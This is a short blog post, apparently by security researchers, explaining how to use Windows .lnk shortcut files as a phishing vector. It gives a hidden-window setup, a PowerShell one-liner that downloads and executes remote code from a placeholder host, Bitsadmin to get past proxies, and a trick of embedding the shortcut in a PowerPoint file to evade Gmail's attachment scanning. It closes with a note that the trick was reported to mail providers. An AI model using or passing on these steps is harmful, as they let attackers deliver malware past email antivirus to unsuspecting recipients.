Another Phishing Vector


A fact well known that malicious files can infect by using different methods with Lnk extension files. Call "lnk" scripts from PowerShell and put some files into a zip file as an example. We also know that "lnk" files are being actively used in social engineering attack because we can change the file icons.

In this article, we will examine some of the malware infecting techniques described as "lesser known" by using .lnk files. Let's start with a simple example. Run the calc.exe file from the shortcut file. We define the following code as a shortcut.

Powershell.exe calc.exe

As you can see, when the calc.exe application run, the cmd window opened and closed in a few seconds. We should edit the settings of the application as shown in Figure-1 to less draw attention.

When the exe file run, it will work without any windows open with this arrangement.


Figure-1 File is hiding. (Minimized)

As we have successfully hidden the window, we continue to work through Powershell. Now, we will try to download and run the file from external network with powershell.exe.

we can use the following command to download files from the external network:

powershell "IEX (New-Object Net.WebClient).DownloadString('HOST');"

It's easy to do this using Powershell's download feature, but there's a problem in the foreseeable future. The simplest known example is giving a proxy error. To bypass this, you can use the Bitsadmin in the windows operating system.

One of the other problems is that the created file has a 255 character limit for the shortcut. We can not use shortcuts with a very large attack vector, but we can download the malicious file from the internet and run it.

Everything is ok, but it will give an error you when we receive or send the file via Gmail.


Figure - 2. Blocking files with .lnk extension

To bypass this, we are zipped this malicious file; But Gmail will give an error again . ( We can think of this example as any antivirus-protected mail service )


Figure - 3. Blocking files with .lnk + zip extensions

Malicious files detected by antivirus but finally we can use .lnk + powershell + bitsadmin. We will do a little trick to bypass the Gmail's antivirus protection. We are opening an empty PowerPoint presentation and we are moving an "lnk" file to here that we have already created. In this way, we can easily bypass the protection mechanism.


Figure - 4 .lnk file in Powerpoint presentation


Figure - 5 .lnk + PowerPoint file

Finally, I reported this lesser known trick with their security team like Gmail, Outlook and Fastmail and the vulnerability has not been fixed.

@evrnyalcin / @aburakalper